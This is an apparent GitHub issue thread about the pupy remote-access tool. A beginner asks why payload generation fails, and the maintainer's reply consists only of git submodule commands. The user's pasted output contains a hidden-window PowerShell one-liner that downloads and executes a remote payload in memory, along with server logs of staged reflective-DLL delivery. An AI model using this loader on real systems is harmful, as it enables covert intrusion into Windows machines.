### ISSUE TITLE
Two noob questions (about payload templates)

### ISSUE THREAD

**Issue by rayluch** [n1nj4sec/pupy#145]
Hi, basically, I am a noob trying to see if I can make it work. I have read the wiki and tried to use Pupy, and I have 2 questions. Sorry if I seem clueless:

1- First, When I use this command: ./pupygen.py -f ps1_oneliner connect --host 192.168.1.x:443 --transport http

This is the result:

[+] copy/paste this one-line loader to deploy pupy without writing on the disk :
 --- 
powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://192.168.1.x:8080/p')"
 --- 
[+] Started http server on 0.0.0.0:8080 
[+] waiting for a connection ...
192.168.1.x - - [08/Aug/2016 02:50:47] "GET /p HTTP/1.1" 200 -
[+]  powershell script stage1 served !
192.168.1.x - - [08/Aug/2016 02:50:56] "GET /p HTTP/1.1" 200 -
[+]  powershell script stage1 served !

That's it. Nothing else is happening. Isn't supposed to try to use the payloads? Is it because I need to paste that command in the Windows computer? It worked once (using that command in the command line), and this was the result:

192.168.1.x - - [08/Aug/2016 02:22:52] "GET /p HTTP/1.1" 200 -
[+]  powershell script stage1 served !
192.168.1.x - - [08/Aug/2016 02:22:53] "GET /rpi HTTP/1.1" 200 -
[+]  powershell Invoke-ReflectivePEInjection.ps1 script served !
192.168.1.x - - [08/Aug/2016 02:22:53] "GET /b64 HTTP/1.1" 200 -
[+]  generating amd64 reflective dll ...
----------------------------------------
Exception happened during processing of request from ('192.168.1.x', 50612)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/Escritorio/pupy/pupy/pupylib/payloads/ps1_oneliner.py", line 101, in do_GET
    self.wfile.write(aes_encrypt(get_edit_pupyx64_dll(self.server.payload_conf), self.server.aes_key))
  File "/root/Escritorio/pupy/pupy/pupygen.py", line 24, in get_edit_pupyx64_dll
    return get_edit_binary(os.path.join("payload_templates","pupyx64.dll"), conf)
  File "/root/Escritorio/pupy/pupy/pupygen.py", line 35, in get_edit_binary
    with open(path, 'rb') as f:
IOError: [Errno 2] No such file or directory: 'payload_templates/pupyx64.dll'

Second question: 
How do I generate payload templates? Where do I use those commands you have put in the wiki? Would you mind to be more specific so that others (probably with little knowledge like me) with the same question don't need to ask it again? 

I have python2.7 installed, the requirements for pupy installed, GNU make comes with linux, right? And I have no idea where to find Visual C++ for python 2.7 for Linux. Maybe its already installed, I am not sure.

Thank you very much for reading this, don't worry, you don't have to explain everything, at least give me some clues so that I can fix it.

**Comment by n1nj4sec** [comment]
```
git submodule init
git submodule update
```
